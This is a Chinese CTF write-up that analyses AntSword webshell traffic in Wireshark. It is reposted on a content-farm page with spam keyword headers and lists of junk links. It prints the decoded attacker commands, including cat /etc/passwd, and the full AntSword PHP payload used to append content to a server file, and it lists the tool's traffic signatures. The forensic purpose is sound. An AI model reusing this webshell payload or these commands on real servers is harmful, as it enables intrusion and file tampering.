当前位置: 首页 > wzjs >正文

公司手机网站建设网站开发雷小天

公司手机网站建设,网站开发雷小天,选择一个网站进行优化,微信小程序代理任务: 木马的连接密码是多少 这是分析蚁剑流量,可能是网站的,wireshark过滤http 追踪流http得到 1就是连接密码 flag{1}黑客执行的第一个命令是什么 取最后的执行命令。base64解密得 除了id不是蚁剑自带的命令,其他的都是&…

任务:

木马的连接密码是多少

这是分析蚁剑流量,可能是网站的,wireshark过滤http

追踪流http得到

1就是连接密码

flag{1}

黑客执行的第一个命令是什么

取最后的执行命令。base64解密得

除了id不是蚁剑自带的命令,其他的都是,所以

flag{id}

黑客读取了哪个文件的内容,提交文件绝对路径

依次读取不同的流。

读到第二个流的时候。

读取了/etc/passwd

flag{/etc/passwd}

黑客上传了什么文件到服务器,提交文件名

将6个蚁剑webshell木马的请求内容全部解码,得到:

0、cd "/var/www/html";id;echo e124bc;pwd;echo 43523
1、cd "/var/www/html";ls;echo e124bc;pwd;echo 43523
2、cd "/var/www/html";cat /etc/passwd;echo e124bc;pwd;echo 43523
3/var/www/html/flag.txt
4/var/www/html/
5/var/www/html/config.php

其中第1个请求和第4个请求都是打印文件清单,因此可通过对比两个文件清单的差异,来判断黑客增删的文件。

发现多了个flag.txt文件。

黑客上传的文件内容是什么

第三个估计就是上传东西到flag.txt里面,所以进行url解码。url解码之后进行js美化

1 = @ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);$oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);@array_push($oparr, $ocwd, sys_get_temp_dir());foreach($oparr as $item) {if (!@is_writable($item)) {continue;};$tmdir = $item."/.368479785";@mkdir($tmdir);if (!@file_exists($tmdir)) {continue;}$tmdir = realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr = @preg_split("/\\\\|\//", $tmdir);for ($i = 0; $i < sizeof($cntarr); $i++) {@chdir("..");};@ini_set("open_basedir", "/");@rmdir($tmdir);break;};
};;function asenc($out) {return $out;
};function asoutput() {$output = ob_get_contents();ob_end_clean();echo "6960"."cb205";echo @asenc($output);echo "1e0a"."91914";
}
ob_start();
try {$f = base64_decode(substr($_POST["t41ffbc5fb0c04"], 2));$c = $_POST["ld807e7193493d"];$c = str_replace("\r", "", $c);$c = str_replace("\n", "", $c);$buf = "";for ($i = 0; $i < strlen($c); $i += 2) $buf. = urldecode("%".substr($c, $i, 2));echo(@fwrite(fopen($f, "a"), $buf) ? "1" : "0");;
} catch (Exception $e) {echo "ERROR://".$e - > getMessage();
};
asoutput();
die(); & ld807e7193493d = 666 C61677B77726974655F666C61677D0A & t41ffbc5fb0c04 = 0 ZL3Zhci93d3cvaHRtbC9mbGFnLnR4dA ==
ld807e7193493d = 666 C61677B77726974655F666C61677D0A & t41ffbc5fb0c04 = 0 ZL3Zhci93d3cvaHRtbC9mbGFnLnR4dA ==

最后那行拿出来解码

得出上传的内容是:

flag{write_flag}

黑客下载了哪个文件,提交文件绝对路径

第四点的时候我们已经得出黑客下载了config.php文件

flag{/var/www/html/config.php}

总结-蚁剑明显流量特征

1、使用URL编解码;

2、每个数据包前面都会包含@ini_set(“display_errors”, “0”);@set_time_limit(0);这两个语句;

3、响应包都是明文。


文章转载自:

http://piS07QBz.cypLn.cn
http://469QI10d.cypLn.cn
http://SDhUsOHB.cypLn.cn
http://vgmzZ6uu.cypLn.cn
http://OGJRHh14.cypLn.cn
http://Vd9RC5fU.cypLn.cn
http://XQPRidgT.cypLn.cn
http://mcav1xwL.cypLn.cn
http://VWjjJVs1.cypLn.cn
http://2SxZVPak.cypLn.cn
http://L4XiW4zX.cypLn.cn
http://yXAlV9Lk.cypLn.cn
http://m5aD98p9.cypLn.cn
http://DTbYE5En.cypLn.cn
http://KkJflw3s.cypLn.cn
http://vwuqEQP7.cypLn.cn
http://VeVCZqC6.cypLn.cn
http://TUlN7goN.cypLn.cn
http://Yl9WCgcN.cypLn.cn
http://O5OtJUP1.cypLn.cn
http://SndDt7tW.cypLn.cn
http://2auW7mFA.cypLn.cn
http://C2VWak1V.cypLn.cn
http://oqUmRQ7k.cypLn.cn
http://d5vt61Fi.cypLn.cn
http://dcrBquwP.cypLn.cn
http://aDe2ngGw.cypLn.cn
http://9SNmynct.cypLn.cn
http://Z3CMyZq6.cypLn.cn
http://4J3PRFJx.cypLn.cn
http://www.dtcms.com/wzjs/752708.html

相关文章:

  • 网站开发相关书籍淘宝商城网站建设
  • 运城姚孟网站建设营销总监
  • 郑州一建集团工程建设有限公司网站遵义网约车平台哪家好
  • cms建站步骤百度网盘下载官网
  • 凡科建站如何制作论坛中国建设招标网上查询
  • 传奇网站模块下载广州番禺网站公司哪家好
  • 建网站没有公司资质宝安关于网站建设
  • 涉县企业做网站推广win优化大师有用吗
  • 网站被禁止访问怎么打开免费素材库网
  • 赣州北京网站建设二级域名做很多网站
  • 网站搭建联系方式河南建设工程信息网下载
  • 网站开发书wordpress 数据库设计
  • 沙洋县住房和城乡建设局网站网站的pv是什么
  • 网站广告位怎么做荆门市网站建设
  • 做网站要多少钱呀一个seo良好的网站其主要流量往往来自
  • 江苏省医院网站建设管理规范微信网页版注册
  • 医院网站管理制度苏州工业园区官网
  • 资源下载网站源码wordpress消息系统
  • 如何查看网站是否被百度收录自己建设网站要花多少钱
  • 做网站审批号必须要网站建设技术外包
  • wordpress全站注明WordPress 主页缩略图链接
  • 乐陵网站服务在哪一条房产网站建设价格
  • 新校区建设网站管理规定百度浏览器主页网址
  • 网站网页设计模板下载wordpress显示空白页
  • 工信部 加强网站备案怎样做网站备案
  • 手机网站怎么设置成电脑版的邯郸制作网站的公司
  • 网站安全建设情况报告闵行区网站设计
  • 成都公布最新轨迹秦皇岛网络优化排名
  • 网站建设中如何使用字体2345网址导航怎么卸载
  • 武穴网站建设国外免费域名申请